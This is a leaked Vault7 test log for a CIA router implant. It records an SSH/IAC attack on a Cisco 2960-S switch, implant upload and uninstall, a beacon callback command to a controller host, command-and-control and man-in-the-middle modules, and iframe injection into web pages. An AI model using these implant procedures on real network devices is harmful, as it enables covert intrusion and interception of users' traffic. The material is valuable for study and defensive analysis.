Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
Owner: User #71467
Aquaman-5h-Without-Snooping Test Notes
Xetron redelivered Aquaman-5h without snooping as an interim solution to EAREnterprise Archive 5244. Plan is to run through Smoke tests from previous Aquaman-5h testing, as well as verify that the bug from EAREnterprise Archive 5244 is not reproducible.
Testing Summary
- 2960S crashes and reloads if show stacks issued during a reinstall of hg (after initial install with leave_behind and uninstall)
- Confirmed snoop not enabled
Progress / Notes
- Run through HG Base Smoke Tests
- Install/Uninstall without leave-behind
- Establish baseline values for clean target device - skipped because we already have that data from previous testing
- IAC attack - successful, received codes were 125, 60, 159 which are in the readme
- Edited target-aliases to use target address 172.31.255.14
- Edited target-aliases to use correct proc_id
- HG upload - hg_start, left 1s delay between packets
- HG uploaded successfully - result good
- Establish CTCounter Terrorism Session with HG according to readme
- Edit Aquaman-5h.txt hostfile - set listening interface of flux node to eth0 and IP to trigger to 192.168.21.10 (Seeds host)
- Ran ./prep-ct.sh
- Started CutThroat ./cutthroat ilm_hg.so - listening on 443 and trigger windows
- Trigger implant - beacon call_base_back https 172.20.12.22 443 -ii 192.168.21.10 -im 0050.5688.256d -iv 1 -mi 0011.bb89.21c4
- 0011.bb89.21c4 is MACApple Operating System address of 192.168.21.1
- Successful HG comms
- Uninstall according to readme
- device uninstall_hg -mp -f - Successful
- Memory back down, no syslog messages, no crash
- Install/Uninstall with leave-behind
- Reloaded switch to start with a clean switch
- SSHIAC attack - successful, received codes were in readme
- HG upload - hg_start_leave_behiind - delay of 1s delay between packets - Successful
- Collected a show tech
- Establish CTCounter Terrorism Session with HG according to readme
- Started CutThroat ./cutthroat ilm_hg.so - listening on 443 and trigger windows
- Trigger implant - beacon call_base_back https 172.20.12.22 443 -ii 192.168.21.10 -im 0050.5688.256d -iv 1 -mi 0011.bb89.21c4
- 0011.bb89.21c4 is MACApple Operating System address of 192.168.21.1
- Successful HG comms
- Uninstall according to readme - successful, no anamolies seen
- Did broad on remote - ok
- hg_start to reinstall
- While hg was reinstalling, i typed show stacks on switch - 1s later the switch crashed with the following error:
Instruction Access Exception (0x0400)!
Not sure if this was related to entering show stacks whlie hg reinstall taking place or if that was a coincidence
- While hg was reinstalling, i typed show stacks on switch - 1s later the switch crashed with the following error:
- Attempt to reproduce the crash
- SSHIAC attack
- Changed interpacket time to 0.1s
- hg_start_leave_behind - successful
- Establish CTCounter Terrorism Session
- Uninstall according to readme - successful, no anamolies seen
- hg_start to reinstall
- No show commands entered - successful reinstall
- Establish CTCounter Terrorism Session
- Uninstall hg - successful
- SSHIAC attack
- hg_start_leave_behind to reintsall
- this time, enter show stacks during install
- no crashes - output of show stacks does show the artifacts, this is a known issue
- Could not establish comms - reloading switch and going to try to repeat again
- Reloaded switch
- SSHIAC attack
- hg_start_leave_behind
- Establish CTCounter Terrorism session
- device hg_uninstall -mp -f
- hg_start_leave_behind - i entered show stacks during install and it crashed again
- Command and Control
- Establish CTCounter Terrorism session and verify versions/capabilities
- Reload switch to start with clean target
- SSHIAC attack
- hg_start
- Established CTCounter Terrorism session
- ilm show - ilm version 3.8.0
- device get_uid - 1ce85d68a280
- beacon show - beacon not enabled for this op
- capability show -v
- baseline version 3.3.0
- lists all modules
- Basic command and control
- module show - modules running
- module stop Trigger - success
- module start Trigger.mod - success
- ilm refresh - success
- module show - success - Trigger module running
- Hit tab key to verify output of available commands
- mitm present, collect present
- dns show, web show, https show - startup delay set to 32850k days - no snoop
- dns get_snooped_host_list_client 0 100 - no snooped hosts even though seeds running
- Boundary Test
- Run through list in HG Base Smoke Test Procedure - all failed gracefully, did not attempt to start snoop
- Establish CTCounter Terrorism session and verify versions/capabilities
- CI Profile
- Collect output for comparison - collected output in new files, will compare to previous test output
- 29.66712 MB more Used memory with HG installed
- Observed same spikes in CPU during SSHIAC attack, HG upload and SSLSecure Socket Layer handshake as observed in previous testing
- No change to file system
- Show tech - observed known show stacks and show controllers artifacts
- Show tech after hg uninstall - output of show tech platform tcam util asic all has a higher number for one value - IPv4 security aces went from 36 to 284 for ASIC 0 and ASIC 1 - need to test this further
- Show tech with hg - no output for remote command all show vtp status, whereas there is output for without hg and after hg uninstall. need to test this further.
- Added to Rancid and ran once with HG, then uninstalled hg, reloaded switch, and ran rancid again to compare
- RANCID rev 1.3 with HG, rev 1.5 without - no differences
- Collect output for comparison - collected output in new files, will compare to previous test output
- SMITE Smoke Test - following documented HG 3.3.0 SMITE Capability Smoke Test Procedure
- Start with a clean, reloaded 2960-S
- SSHIAC attack and HG install
- Established CTCounter Terrorism session
- Completed module control test - stop, start - did not complete module delete and reload test
- Did not test module persistence
- Created SMITE rule
- Iframe is injected into web page, viewed in source URL, however Windex server says all sessions used. Something wrong with Windex.